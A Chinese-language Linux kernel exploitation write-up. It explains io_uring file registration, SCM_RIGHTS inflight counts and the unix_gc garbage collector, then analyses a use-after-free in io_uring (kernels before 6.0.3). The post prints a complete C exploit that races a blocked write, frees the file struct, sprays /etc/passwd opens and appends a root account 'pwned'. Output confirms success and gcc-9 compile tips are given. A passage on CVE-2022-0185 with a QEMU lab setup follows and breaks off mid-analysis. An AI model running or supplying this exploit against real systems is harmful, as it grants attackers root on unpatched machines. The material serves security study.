ret = __io_uring_register(ctx, opcode, arg, nr_args); /* 核心函数 */
mutex_unlock(&ctx->uring_lock);
trace_io_uring_register(ctx, opcode, ctx->nr_user_files, ctx->nr_user_bufs,
ctx->cq_ev_fd != NULL, ret);
out_fput:
fdput(f);
return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
static int __io_uring_register(struct io_ring_ctx *ctx, unsigned opcode,
void __user *arg, unsigned nr_args)
__releases(ctx->uring_lock)
__acquires(ctx->uring_lock)
{
int ret;

......

case IORING_REGISTER_FILES:
ret = io_sqe_files_register(ctx, arg, nr_args, NULL); /* 核心函数 */
break;

......

if (io_register_op_must_quiesce(opcode)) {
/* bring the ctx back to life */
percpu_ref_reinit(&ctx->refs);
reinit_completion(&ctx->ref_comp);
}
return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
static int io_sqe_files_register(struct io_ring_ctx *ctx, void __user *arg,
unsigned nr_args, u64 __user *tags)
{
__s32 __user *fds = (__s32 __user *) arg;
struct file *file;
int fd, ret;
unsigned i;
struct io_rsrc_data *file_data;

if (ctx->file_data)
return -EBUSY;
if (!nr_args)
return -EINVAL;
if (nr_args > IORING_MAX_FIXED_FILES)
return -EMFILE;
ret = io_rsrc_node_switch_start(ctx);
if (ret)
return ret;

file_data = io_rsrc_data_alloc(ctx, io_rsrc_file_put, nr_args);
if (!file_data)
return -ENOMEM;
ctx->file_data = file_data;
ret = -ENOMEM;
if (!io_alloc_file_tables(&ctx->file_table, nr_args))
goto out_free;

for (i = 0; i < nr_args; i++, ctx->nr_user_files++) {
/* 遍历所有用户传进来的文件描述符 */
u64 tag = 0;

if ((tags && copy_from_user(&tag, &tags[i], sizeof(tag))) ||
copy_from_user(&fd, &fds[i], sizeof(fd))) { /* 获取用户传递的文件描述符fd */
ret = -EFAULT;
goto out_fput;
}
/* allow sparse sets */
if (fd == -1) {
ret = -EINVAL;
if (unlikely(tag))
goto out_fput;
continue;
}

file = fget(fd); /* 获取文件结构体,fget会对文件引用次数+1 */
ret = -EBADF;
if (unlikely(!file))
goto out_fput;

/*
* Don't allow io_uring instances to be registered. If UNIX
* isn't enabled, then this causes a reference cycle and this
* instance can never get freed. If UNIX is enabled we'll
* handle it just fine, but there's still no point in allowing
* a ring fd as it doesn't support regular read/write anyway.
*/
if (file->f_op == &io_uring_fops) {
fput(file);
goto out_fput;
}
ctx->file_data->tags[i] = tag;
io_fixed_file_set(io_fixed_file_slot(&ctx->file_table, i), file);
}

ret = io_sqe_files_scm(ctx); /* 核心函数 */

......

return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
static int io_sqe_files_scm(struct io_ring_ctx *ctx)
{
unsigned left, total;
int ret = 0;

total = 0;
left = ctx->nr_user_files;
while (left) { /* 遍历所有的注册文件 */
unsigned this_files = min_t(unsigned, left, SCM_MAX_FD);

ret = __io_sqe_files_scm(ctx, this_files, total); /* 核心函数 */
if (ret)
break;
left -= this_files;
total += this_files;
}

if (!ret)
return 0;

while (total < ctx->nr_user_files) {
struct file *file = io_file_from_index(ctx, total);

if (file)
fput(file);
total++;
}

return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
static int __io_sqe_files_scm(struct io_ring_ctx *ctx, int nr, int offset)
{
struct sock *sk = ctx->ring_sock->sk;
struct scm_fp_list *fpl;
struct sk_buff *skb;
int i, nr_files;

fpl = kzalloc(sizeof(*fpl), GFP_KERNEL);
if (!fpl)
return -ENOMEM;

skb = alloc_skb(0, GFP_KERNEL); /* 申请一个sk_buff */
if (!skb) {
kfree(fpl);
return -ENOMEM;
}

skb->sk = sk;

nr_files = 0;
fpl->user = get_uid(current_user());
for (i = 0; i < nr; i++) { /* 遍历所有文件 */
struct file *file = io_file_from_index(ctx, i + offset); /* 获得文件结构体 */

if (!file)
continue;
fpl->fp[nr_files] = get_file(file); /* get_file同样会使file引用次数+1,把文件注册到fpl中 */
unix_inflight(fpl->user, fpl->fp[nr_files]); /* 把文件添加到发送队列,会增加sock类型文件的inflight飞行计数 */
nr_files++;
}

if (nr_files) {
fpl->max = SCM_MAX_FD;
fpl->count = nr_files;
UNIXCB(skb).fp = fpl; /* skb会保存所有用户传入的file结构,存于skb->fp->fp */
skb->destructor = unix_destruct_scm;
refcount_add(skb->truesize, &sk->sk_wmem_alloc);
skb_queue_head(&sk->sk_receive_queue, skb); /* skb添加到sk_receive_queue(io_uring sock的接收队列)中 */

for (i = 0; i < nr_files; i++)
fput(fpl->fp[i]); /* 对这些文件使用fput,平衡刚刚使用的get_file */
} else {
kfree_skb(skb);
kfree(fpl);
}

return 0;
}
  • 用户传入的文件描述符都会保存在 skb->fp->fp 中,如果目标 skb 被销毁,则存储在 skb->fp->fp 中所有的 file 结构体都会被执行 fput 操作
  • sk_receive_queue 代表一个 socket 还未接收的消息队列

引用计数与飞行计数

在 linux 中 file 结构体用于描述一个打开的文件,其中的 file->f_count 成员用于记录其引用数目

  • 可能存在多个文件描述符对应同一个 file 结构体的情况(多个进程打开同一个文件,或者使用 dup() 函数拷贝文件描述符)
  • 函数 open dup fork 会使 file->f_count 增加,函数 close exit 会使 file->f_count 减小,当 file->f_count 为“0”时则释放 file 结构体

实际能引起文件引用计数变化的内核函数有:

  • fget():通过文件描述符获取 struct file,并把文件引用计数 +1
  • get_file():传入是 struct file,返回 struct file,该函数单纯的把文件引用计数 +1
  • fput():减少一次文件引用计数,如果减少到 0 则会释放文件的 struct file 结构

SCM_RIGHTS 消息拥有传递文件描述符信息的能力,linux 内核可以通过 sendmsg 系统调用来传递 SCM_RIGHTS 消息,也就是在两个不相关的进程间传递文件描述符信息

  • 该功能的本意是有权限打开文件的进程打开文件,然后传递给没权限打开的进程使用
  • 当 sender 进程将文件描述符传递给另一个 receiver 进程时,SCM_RIGHTS 将创建一个对 file 结构的引用
  • 当 receiver 进程确定接收到文件描述符时,SCM_RIGHTS 创建的引用将会被消除

使用 SCM_RIGHTS 可能会造成内存泄露问题:

1
2
3
4
5
(1)该进程创建socket A 和 B		  (fileA->f_count=1, fileA->f_count=1)
(2)将socket A 发送到 socket B (fileA->f_count=2, fileA->f_count=1)
(3)将socket B 发送到 socket A (fileA->f_count=2, fileA->f_count=2)
(4)关闭socket A (fileA->f_count=1, fileA->f_count=2)
(5)关闭socket B (fileA->f_count=1, fileA->f_count=1)
  • 由于 socket A 和 socket B 互相发给彼此的 SCM_RIGHTS 消息并没有被接收,导致 fileA->f_countfileB->f_count 都为“1”,并且没有办法将其释放掉

函数 unix_inflight 用于增加飞行计数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
void unix_inflight(struct user_struct *user, struct file *fp)
{
struct sock *s = unix_get_socket(fp); /* 只有socket和io_uring的fd才能找到sock */

spin_lock(&unix_gc_lock);

if (s) { /* 对于sock类型文件则增加飞行计数 */
struct unix_sock *u = unix_sk(s);

if (atomic_long_inc_return(&u->inflight) == 1) {
BUG_ON(!list_empty(&u->link));
list_add_tail(&u->link, &gc_inflight_list); /* 添加到gc_inflight_list全局飞行列表 */
} else {
BUG_ON(list_empty(&u->link));
}
unix_tot_inflight++; /* 全局飞行文件数+1 */
}
user->unix_inflight++; /* 用户统计飞行计数+1 */
spin_unlock(&unix_gc_lock);
}

内核垃圾回收系统

Linux 内核垃圾回收系统就是为了防止这种情况下的内存耗尽,引入 inflight 飞行计数是为了识别潜在的垃圾

  • 当采用 SCM_RIGHTS 数据报发送文件描述符时,Linux 内核将其 unix_sock 放入全局列表 gc_inflight_list 中,并递增 unix_tot_inflight(表示飞行中的 socket 总数)
  • 然后,内核递增 u->unix_inflight 以记录每个文件描述符的飞行计数(表示正在被传递的数目)

引用飞行计数后,还是会出现不可破循环的现象:

1
2
3
4
5
(1)该进程创建socket A 和 B		  (ref=1 inflight=0, ref=1 inflight=0)
(2)将socket A 发送到 socket B (ref=2 inflight=1, ref=1 inflight=0)
(3)将socket B 发送到 socket A (ref=2 inflight=1, ref=2 inflight=1)
(4)关闭socket A (ref=1 inflight=1, ref=2 inflight=1)
(5)关闭socket B (ref=1 inflight=1, ref=1 inflight=1)
  • 当 A 和 B 的引用计数都等于每个 socket 文件描述符的飞行计数,这是可能存在垃圾的迹象

linux 垃圾处理的核心函数如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
void unix_gc(void)
{
struct unix_sock *u;
struct unix_sock *next;
struct sk_buff_head hitlist;
struct list_head cursor;
LIST_HEAD(not_cycle_list);

spin_lock(&unix_gc_lock);

/* Avoid a recursive GC. */
if (gc_in_progress)
goto out;

gc_in_progress = true;
/* First, select candidates for garbage collection. Only
* in-flight sockets are considered, and from those only ones
* which don't have any external reference.
*
* Holding unix_gc_lock will protect these candidates from
* being detached, and hence from gaining an external
* reference. Since there are no possible receivers, all
* buffers currently on the candidates' queues stay there
* during the garbage collection.
*
* We also know that no new candidate can be added onto the
* receive queues. Other, non candidate sockets _can_ be
* added to queue, so we must make sure only to touch
* candidates.
*/
list_for_each_entry_safe(u, next, &gc_inflight_list, link) {
/* 遍历gc_inflight_list全局飞行列表中的每一个成员 */
long total_refs;
long inflight_refs;

total_refs = file_count(u->sk.sk_socket->file); /* 获取文件的引用计数 */
inflight_refs = atomic_long_read(&u->inflight); /* 获取文件的飞行计数 */

BUG_ON(inflight_refs < 1);
BUG_ON(total_refs < inflight_refs);
if (total_refs == inflight_refs) { /* 引用计数和飞行计数相等则触发垃圾收集 */
list_move_tail(&u->link, &gc_candidates);
__set_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
__set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
}
}

/* Now remove all internal in-flight reference to children of
* the candidates.
*/
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, dec_inflight, NULL);

/* Restore the references for children of all candidates,
* which have remaining references. Do this recursively, so
* only those remain, which form cyclic references.
*
* Use a "cursor" link, to make the list traversal safe, even
* though elements might be moved about.
*/
list_add(&cursor, &gc_candidates);
while (cursor.next != &gc_candidates) {
u = list_entry(cursor.next, struct unix_sock, link);

/* Move cursor to after the current position. */
list_move(&cursor, &u->link);

if (atomic_long_read(&u->inflight) > 0) {
list_move_tail(&u->link, &not_cycle_list);
__clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags);
scan_children(&u->sk, inc_inflight_move_tail, NULL);
}
}
list_del(&cursor);

/* Now gc_candidates contains only garbage. Restore original
* inflight counters for these as well, and remove the skbuffs
* which are creating the cycle(s).
*/
skb_queue_head_init(&hitlist);
list_for_each_entry(u, &gc_candidates, link)
scan_children(&u->sk, inc_inflight, &hitlist);

/* not_cycle_list contains those sockets which do not make up a
* cycle. Restore these to the inflight list.
*/
while (!list_empty(&not_cycle_list)) {
u = list_entry(not_cycle_list.next, struct unix_sock, link);
__clear_bit(UNIX_GC_CANDIDATE, &u->gc_flags);
list_move_tail(&u->link, &gc_inflight_list);
}

spin_unlock(&unix_gc_lock);

/* Here we are. Hitlist is filled. Die. */
__skb_queue_purge(&hitlist); /* 清理垃圾 */

spin_lock(&unix_gc_lock);

/* All candidates should have been detached by now. */
BUG_ON(!list_empty(&gc_candidates));
gc_in_progress = false;
wake_up(&unix_gc_wait);

out:
spin_unlock(&unix_gc_lock);
}
1
2
3
4
5
6
static inline void __skb_queue_purge(struct sk_buff_head *list)
{
struct sk_buff *skb;
while ((skb = __skb_dequeue(list)) != NULL)
kfree_skb(skb);
}
  • 垃圾收集会释放掉引用计数等于飞行计数的所有 skb,并会对 skb 中的所有 file 调用 fput

漏洞分析

影响版本:Linux Kernel < v6.0.3(v6.0.3 已修复)

漏洞效果就是在 io_uring 执行 IO 任务之前非法把文件释放掉,核心思路类似于 DirtyFile:

  • 利用另一个线程提前打开 io_uring 需要写入的文件
  • 在 io_uring 陷入阻塞的时候将该文件的 file 结构体释放掉
  • 堆喷另一个文件的 file 结构体来占位
  • 另一个线程释放 inode 锁,io_uring 拿到锁后就会写入目标文件了

如何在 io_uring 阻塞时释放其将要操作的 file 结构体,理论上来说 io_uring 始终会占用一个文件计数器,目标 file 结构体的文件计数器是不可能为 “0” 的

但在 unix_gc 释放 skb 的过程中会对 skb 中的所有 file 调用 fput,这里没有考虑 io_uring file 可能会阻塞的问题(逻辑漏洞),导致该 file 在任务阻塞完毕之前被释放,从而造成 UAF

入侵思路

漏洞的触发过程比较复杂,分析了网上很多的 wp 和 exp 后,提取出如下的关键代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
socketpair(AF_UNIX, SOCK_DGRAM, 0, s); /* 准备一对socket(s[0],s[1]),准备好之后默认的引用计数均为1 */

fd = io_uring_setup(32, params); /* 获取一个文件描述符记为fd,初始状态引用计数为1 */

rfd[0] = s[1];
rfd[1] = open("/tmp/rwA", O_RDWR | O_CREAT | O_APPEND, 0644); /* 打开一个普通可读写文件,初始状态引用计数为1 */
io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2); /* 使用io_uring_register的注册功能将s[1]和rfd[1]注册到fd中 */
/*
s[1]和rfd[1]生成对应的skb保存到了fd的sk->sk_receive_queue队列中
s[1]和rfd[1]对应的file结构体都存放入skb->fp->fp中
> s[1]:引用计数2,飞行计数1
> rfd[1]:引用计数2,飞行计数0
> fd:引用计数1,飞行计数0
*/

close(rfd[1]); /* 关闭rfd[1],引用计数1 */

sendfd(s[0], fd); /* 使用s[0]将fd发送给s[1],fd引用计数2,飞行计数1 */

close(s[0]); /* 引用计数0,被释放 */
close(s[1]); /* 引用计数1,飞行计数1,暂时不会被释放 */

pthread_create(&t, NULL, slow_write, NULL);
/*
先往"/tmp/rwA"文件写入大量数据,占据inode文件锁
再向fd(io_uring)提交一个文件写(writev)的任务,往"/tmp/rwA"文件写入恶意数据(新的root账户和密码)
这个任务就会阻塞在文件权限检查之后,实际写之前
*/

io_uring_queue_exit(&ring); /* 关闭fd,fd的引用计数1(此时io_uring暂时不会被释放,可以正常工作) */

if(!fork()){ /* 创建一个socket,并且关闭,触发垃圾回收unix_gc */
close(socket(AF_UNIX, SOCK_DGRAM, 0));
exit(0);
}

int tfd = open("/etc/passwd", O_RDONLY | O_DIRECT);
for(int i =0; i < 600; i++){
open("/etc/passwd", O_RDONLY);
}

close(fd);

触发流程如下:

线程A 线程B
进行准备工作
启动线程B 打开"/tmp/rwA"文件,写入大量数据(0x80000 * 0x1000 字节)
打开"/tmp/rwA"文件,尝试写入恶意数据(新的 root 账号和密码),提交写任务到 io_uring 通过文件权限校验,并获取 inode 文件锁
通过文件权限校验,等待获取 inode 文件锁(io_uring 阻塞) 长时间写入…(持有锁)
触发垃圾回收 unix_gc(在获取 inode 文件锁之前,释放目标 file 结构体) 长时间写入…(持有锁)
打开大量"/etc/passwd"文件,堆喷占位刚刚释放的 file 结构体 释放 inode 文件锁
获得 inode 文件锁,但实际会写入"/etc/passwd"文件(因为 file 结构体被替换)
  • io_uring 会因为线程B占用 "/tmp/rwA" 文件而阻塞(等待 inode 文件锁)
  • 利用阻塞的时间来触发垃圾回收释放阻塞的 file 结构体,造成 UAF
  • 大量打开 "/etc/passwd" 文件的 file 结构体来填充 UAF
  • 最后获取 inode 文件锁时,实际上就是往 "/etc/passwd" 文件中写入数据了

完整 exp 如下:(最好使用 gcc-9 来编译,测试发现 gcc-9 的打通率要显著高于其它版本)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
#define _GNU_SOURCE

#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <liburing.h>
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <linux/userfaultfd.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <err.h>
#include <sched.h>

#define GREEN(x) printf("\033[0;32m"); printf(x); printf("\033[0m");
#define RESET printf("\033[0m")

#define SPIN ({ GREEN("[/]"); \
GREEN("\b\b-]"); \
GREEN("\b\b\\]"); \
GREEN("\b\b|]"); \
GREEN("\b\b-]"); \
GREEN("\b\b|]"); \
GREEN("\b\b\b");\
});

int *start_write;

void pin_cpu(int num){
cpu_set_t mask;
CPU_ZERO(&mask);
CPU_SET(num, &mask);
int result = sched_setaffinity(0, sizeof(mask), &mask);
}

void *slow_write() {
printf("[+] Start slow write to get the lock\n");
int fd = open("/tmp/rwA", 1);

if (fd < 0) {
perror("[!] error open file");
exit(-1);
}

unsigned long int addr = 0x30000000;
int offset;
for(offset = 0; offset < 0x80000 / 20; offset++) {
void *r = mmap((void *)(addr + offset * 0x1000), 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 0, 0);
if (r < 0) {
printf("[!] allocate failed at 0x%x\n", offset);
}
}

assert(offset > 0);
void *mem = (void *)(addr);
memcpy(mem, "hhhhh", 5);

struct iovec iov[20];

for (int i = 0; i < 20; i++) {
iov[i].iov_base = mem;
iov[i].iov_len = (offset - 1) * 0x1000;
}

*start_write = 1;

if (writev(fd, iov, 20) < 0) { /* 大量写入/tmp/rwA(持有inode锁) */
perror("[!] slow write");
}

RESET;
printf("\n[+] write done!\n");
*start_write = -1;
exit(0);
}

struct iovec iov[12];

int sendfd(int s, int fd){
struct msghdr msg;
char buf[4096];
struct cmsghdr *cmsg;
int fds[1] = { fd };
memset(&msg, 0, sizeof(msg));
memset(buf, 0, sizeof(buf));
msg.msg_control = buf;
msg.msg_controllen = sizeof(buf);
cmsg = CMSG_FIRSTHDR(&msg);
cmsg->cmsg_level = SOL_SOCKET;
cmsg->cmsg_type = SCM_RIGHTS;
cmsg->cmsg_len = CMSG_LEN(sizeof(fds));
memcpy(CMSG_DATA(cmsg), fds, sizeof(fds));
msg.msg_controllen = CMSG_SPACE(sizeof(fds));
sendmsg(s, &msg, 0);
}

int io_uring_setup(int r, void *p){
return syscall(__NR_io_uring_setup, r, p);
}

int io_uring_enter(unsigned int fd, unsigned int to_submit, unsigned int min_complete, unsigned int flags, sigset_t *sig){
return syscall(__NR_io_uring_enter, fd, to_submit, min_complete, flags, sig);
}

int io_uring_register(unsigned int fd, unsigned int opcode, void *arg, unsigned int nr_args){
return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
}

int prepare_request(int fd, struct io_uring_params *params, struct io_uring *ring){
struct io_uring_sqe *sqe;
io_uring_queue_mmap(fd, params, ring); /* 通过mmap建立映射关系 */
sqe = io_uring_get_sqe(ring); /* 获取可用SQE */
sqe->opcode = IORING_OP_WRITEV; /* 标记批量写请求(后续需使用IOVEC) */
sqe->fd = 1; /* 要执行IO的文件描述符 | skb->fp->fp中对应文件描述符的下标 */
sqe->addr = (long) iov; /* 指向缓冲区 | IOVEC的指针 */
sqe->len = 1; /* 缓冲区大小 | IOVEC数量 */
sqe->flags = IOSQE_FIXED_FILE; /* 设置了IOSQE_FIXED_FILE标志位后,这里的"sqe->fd=1"其实代表了skb->fp->fp[1],也就是用户传入的rfd[1]("/tmp/rwA"的文件描述符) */
}

int main(int argc, char **argv){
pthread_t t;
struct io_uring ring;
int fd;
struct io_uring_params *params;
int rfd[3];
int s[2];
int target_fd;
start_write = (int *)mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); /* 用于反应两个线程的状态 */
assert(start_write != (int *)-1);

*start_write = 0;

// Password for new root user --> "lol"
iov[0].iov_base = "pwned:$1$aa$Sc4m1DBsyHWbRbwmIbGHq1:0:0:/root:/root:/bin/sh\n";
iov[0].iov_len = 59;
iov[1].iov_base = "hello, world!\n";
iov[1].iov_len = 14;
iov[2].iov_base = "hello, world!\n";
iov[2].iov_len = 14;
iov[10].iov_base = "hello, world!\n";
iov[10].iov_len = 14;
iov[11].iov_base = "hello, world!\n";
iov[11].iov_len = 14;

socketpair(AF_UNIX, SOCK_DGRAM, 0, s); /* SOCK_DGRAM表示UDP(用于在网络上发广播信息) */

params = malloc(sizeof(*params));
memset(params, 0, sizeof(*params));
params->flags = IORING_SETUP_SQPOLL; /* 自动取检查任务队列里是否有新任务并去完成(不需要主动调用io_uring_enter) */

fd = io_uring_setup(32, params); /* 初始化io_uring */
rfd[0] = s[1];
rfd[1] = open("/tmp/rwA", O_RDWR | O_CREAT | O_APPEND, 0644);

io_uring_register(fd, IORING_REGISTER_FILES, rfd, 2); /* IORING_REGISTER_FILES允许将若干文件描述符注册进入io_uring */
close(rfd[1]);

sendfd(s[0], fd);
close(s[0]);
close(s[1]);
printf("[+] Creating thread\n");
pthread_create(&t, NULL, slow_write, NULL);
sleep(1);
prepare_request(fd, params, &ring);
printf("[+] Waiting for the other thread to get lock on file\n");
while(*start_write == 0){
SPIN
}

printf("[+] Thread 1 got inode lock!\n");
printf("[+] Submitting io_uring request\n");

io_uring_submit(&ring); /* 提交SQE请求,底层还是会调用io_uring_enter */

sleep(2);

printf("[+] Closing io_uring\n");

io_uring_queue_exit(&ring);

if(!fork()){
printf("[+] Triggering unix_gc...\n");
close(socket(AF_UNIX, SOCK_DGRAM, 0));
printf("unix_gc done!\n");
exit(0);
}

sleep(2);
printf("[+] Opening /etc/passwd in RDONLY...\n");

int tfd = open("/etc/passwd", O_RDONLY | O_DIRECT); /* 不设置页缓存,提升效率 */
for(int i =0; i < 600; i++){
open("/etc/passwd", O_RDONLY);
}

printf("[+] Waiting for slow_write end...\n");
while(*start_write == 1){
SPIN
}
printf("\n");
sleep(5);
printf("[+] Closing fd\n");
close(fd);
printf("[+] Sleeping before exit ..\n");
sleep(20);
return 0;
}

最终效果如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
/ $ ./exp
[+] Creating thread
[+] Start slow write to get the lock
[+] Waiting for the other thread to get lock on file
[+] Thread 1 got inode lock!
[+] Submitting io_uring request
[+] Closing io_uring
[+] Triggering unix_gc...
unix_gc done!
[+] Opening /etc/passwd in RDONLY...
[+] Waiting for slow_write end...
[|]
[+] write done!
[|]
[|]
/ $ cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/false
bin:x:2:2:bin:/bin:/bin/false
sys:x:3:3:sys:/dev:/bin/false
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/false
www-data:x:33:33:www-data:/var/www:/bin/false
operator:x:37:37:Operator:/var:/bin/false
nobody:x:65534:65534:nobody:/home:/bin/false
pwned:$1$aa$Sc4m1DBsyHWbRbwmIbGHq1:0:0:/root:/root:/bin/sh

CVE-2022-0185

1
Linux version 5.11.16 (yhellow@yhellow-virtual-machine) (gcc (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #2 SMP Thu Nov 30 11:43:05 CST 2023
1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 kaslr pti=on quiet oops=panic panic=1" \
-no-reboot
  • smap,smep,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

漏洞分析

在漏洞分析开始前需要先了解一下 mount 系统调用:

1
2
3
#include <sys/mount.h>

int mount(const char *source, const char *target, const char *filesystemtype, unsigned long mountflags, const void *data);
  • mount 系统调用被用以将文件系统挂载到以 / 为根节点的文件树上

之后有人为 mount 创建了一套更符合 “Linux 一切皆文件” 的 API:

1
2
3
#include <sys/fs.h>

int fsopen(const char *filename, int flags, int mode);
  • fsopen 系统调用则用于打开一个文件系统,并提供一个 “文件系统描述符”(被称为文件系统上下文 filesystem context)

文件系统描述符在内核中的结构体如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
struct fs_context {
const struct fs_context_operations *ops;
struct mutex uapi_mutex; /* Userspace access mutex */
struct file_system_type *fs_type;
void *fs_private; /* The filesystem's context */
void *sget_key;
struct dentry *root; /* The root and superblock */
struct user_namespace *user_ns; /* The user namespace for this mount */
struct net *net_ns; /* The network namespace for this mount */
const struct cred *cred; /* The mounter's credentials */
struct p_log log; /* Logging buffer */
const char *source; /* The source name (eg. dev path) */
void *security; /* Linux S&M options */
void *s_fs_info; /* Proposed s_fs_info */
unsigned int sb_flags; /* Proposed superblock flags (SB_*) */
unsigned int sb_flags_mask; /* Superblock flags that were changed */
unsigned int s_iflags; /* OR'd with sb->s_iflags */
unsigned int lsm_flags; /* Information flags from the fs to the LSM */
enum fs_context_purpose purpose:8;
enum fs_context_phase phase:8; /* The phase the context is in */
bool need_free:1; /* Need to call ops->free() */
bool global:1; /* Goes into &init_user_ns */
bool oldapi:1; /* Coming from mount(2) */
};
  • 核心条目就是 fs_context->fs_private

fsopen 打开一个文件系统后,可以使用 fsconfig 对该文件系统进行配置

1
2
3
#include <sys/fs.h>

int fsconfig(int fd, const char *filename);

若我们给的 cmdFSCONFIG_SET_STRING,则在内核中存在如下调用链:

1
fsconfig -> vfs_fsconfig_locked -> vfs_parse_fs_param

接着就会在 vfs_parse_fs_param 中调用 fs_context->ops->parse_param 函数指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
int vfs_parse_fs_param(struct fs_context *fc, struct fs_parameter *param)
{
int ret;

if (!param->key)
return invalf(fc, "Unnamed parameter\n");

ret = vfs_parse_sb_flag(fc, param->key);
if (ret != -ENOPARAM)
return ret;

ret = security_fs_context_parse_param(fc, param);
if (ret != -ENOPARAM)
/* Param belongs to the LSM or is disallowed by the LSM; so
* don't pass to the FS.
*/
return ret;

if (fc->ops->parse_param) {
ret = fc->ops->parse_param(fc, param);
if (ret != -ENOPARAM)
return ret;
}

......

}
EXPORT_SYMBOL(vfs_parse_fs_param);

对于未设置 init_fs_context 的文件系统类型而言其最终会调用 legacy_init_fs_context 进行初始化,其中 fs_context->ops 会被设置为 legacy_fs_context_ops:(其 parse_param 指针对应为 legacy_parse_param 函数)

1
2
3
4
5
6
7
8
static int legacy_init_fs_context(struct fs_context *fc)
{
fc->fs_private = kzalloc(sizeof(struct legacy_fs_context), GFP_KERNEL);
if (!fc->fs_private)
return -ENOMEM;
fc->ops = &legacy_fs_context_ops;
return 0;
}

漏洞就发生在 legacy_parse_param 函数中,在 ctx 中维护一个大小为 PAGE_SIZE 的 buffer 叫做 legacy_data,作用通常是为了存储和处理数据

1
2
3
4
5
struct legacy_fs_context {
char *legacy_data; /* buffer的地址 */
size_t data_size; /* 已拷贝的数据长度 */
enum legacy_fs_param param_type;
};
  • 通常来说 data_size 必须小于 PAGE_SIZE,但漏洞会导致其大于 PAGE_SIZE 发生溢出
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
static int legacy_parse_param(struct fs_context *fc, struct fs_parameter *param)
{
struct legacy_fs_context *ctx = fc->fs_private;
unsigned int size = ctx->data_size;
size_t len = 0;

......

/* size为已拷贝数据长度,len为待拷贝数据长度 */
if (len > PAGE_SIZE - 2 - size) /* len和size都是无符号,导致整数溢出 */
return invalf(fc, "VFS: Legacy: Cumulative options too large");
if (strchr(param->key, ',') ||
(param->type == fs_value_is_string &&
memchr(param->string, ',', param->size)))
return invalf(fc, "VFS: Legacy: Option '%s' contained comma",
param->key);
if (!ctx->legacy_data) { /* 分配ctx->legacy_data,大小为PAGE_SIZE */
